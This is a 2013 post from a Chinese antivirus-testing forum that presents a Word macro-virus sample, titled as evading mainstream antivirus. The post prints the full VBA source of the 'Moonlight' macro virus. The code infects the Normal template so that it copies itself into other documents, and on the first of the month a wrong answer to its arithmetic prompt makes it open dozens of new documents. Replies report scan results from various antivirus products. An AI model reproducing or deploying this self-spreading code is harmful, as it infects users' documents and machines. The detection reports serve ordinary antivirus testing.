查看: 11575|回复: 60
收起左侧

[病毒样本] 宏病毒文件,过主流杀软。

  [复制链接]
zihan911521
发表于 2013-8-2 11:54:49 | 显示全部楼层 |阅读模式
详细代码:

'Macro_2:moonlight

Dim nm(4)
Sub Document_Open()
'DisableInput 1
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule
Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
    Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "'moonlight" Then
    .DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 3, "Sub Document_Close()"
    If ThisDocument = NormalTemplate Then
        .ReplaceLine 3, "Sub Document_Open()"
        ActiveDocument.SaveAs ActiveDocument.FullName
    End If
End If
End With
Count = 0
If Day(Now()) = 1 Then
try:
        On Error GoTo try
        test = -1
        con = 1
        tog$ = ""
        i = 0
        While test = -1
            For i = 0 To 4
                nm(i) = Int(Rnd() * 10)
                con = con * nm(i)
                If i = 4 Then
                    tog$ = tog$ + Str$(nm(4)) + "=?"
                    GoTo beg
                End If
                tog$ = tog$ + Str$(nm(i)) + "*"
            Next i
beg:
        Beep
        ans$ = InputBox$("今天是" + Date$ + ",跟你玩一个心算游戏" + Chr$(13) + "若你答错,只好接受震撼教育......" + Chr$(13) + tog$, "台湾NO.1 Macro Virus")
        If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
            Documents.Add
            Selection.Paragraphs.Alignment = wdAlignParagraphCenter
            Beep
            With Selection.Font
                .Name = "细明体"
                .Size = 16
                .Bold = 1
                .Underline = 1
            End With
            Selection.InsertAfter Text:="何谓宏病毒"
            Selection.InsertParagraphAfter
            Beep
            Selection.InsertAfter Text:="答案:"
            Selection.Font.Italic = 1
            Selection.InsertAfter Text:="我就是......"
            Selection.InsertParagraphAfter
            Selection.InsertParagraphAfter
            Selection.Font.Italic = 0
            Beep
            Selection.InsertAfter Text:="如何预防宏病毒"
            Selection.InsertParagraphAfter
            Beep
            Selection.InsertAfter Text:="答案:"
            Selection.Font.Italic = 1
            Selection.InsertAfter Text:="不要看我......"
            GoTo out
            Else
                Count = Count + 1
                For j = 1 To 20
                    Beep
                    Documents.Add
                Next j
            Selection.Paragraphs.Alignment = wdAlignParagraphCenter
            Selection.InsertAfter Text:="宏病毒"
            If Count = 2 Then GoTo out
            GoTo try
        End If
Wend
End If
out:
End Sub

















本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
pbbh07
发表于 2013-8-2 11:59:06 | 显示全部楼层
本帖最后由 pbbh07 于 2013-8-2 14:47 编辑

果然过国内三大云扫描(360网盾不报,杀毒扫描报毒)
翔无痕
发表于 2013-8-2 12:07:46 | 显示全部楼层
ie阻止
x1990877p
发表于 2013-8-2 12:18:04 | 显示全部楼层
过kis 扫描 无法在沙盒内打开
卡巴专家
发表于 2013-8-2 12:22:36 | 显示全部楼层
本帖最后由 卡巴专家 于 2013-8-2 12:48 编辑

ESET清除病毒
2013-8-2 12:21:09        文件系统实时防护        文件        C:\Documents and Settings\Administrator\桌面\病毒\病毒.doc        W97M/Moonlight.A 病毒        已清除 - 已隔离        20110417-1949\Administrator        在应用程序新建的文件上发生事件: C:\Program Files\360\360zip\360zip.exe.
漫步殇
发表于 2013-8-2 12:26:00 | 显示全部楼层
红伞

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
wqcaokeyinwq
发表于 2013-8-2 12:49:03 | 显示全部楼层
宏病毒?????

微点主防表示安全。。。。。
ELOHIM
发表于 2013-8-2 13:02:40 | 显示全部楼层
MSE 发现两个病毒 : Virus:W97M/Onex.N
ELOHIM
发表于 2013-8-2 13:03:29 | 显示全部楼层
翔无痕 发表于 2013-8-2 12:07
ie阻止

你用的IE哪个版本?
tg123321
发表于 2013-8-2 13:07:35 | 显示全部楼层
实机用wps打开后发现是个空文档
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-26 00:59 , Processed in 0.125534 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表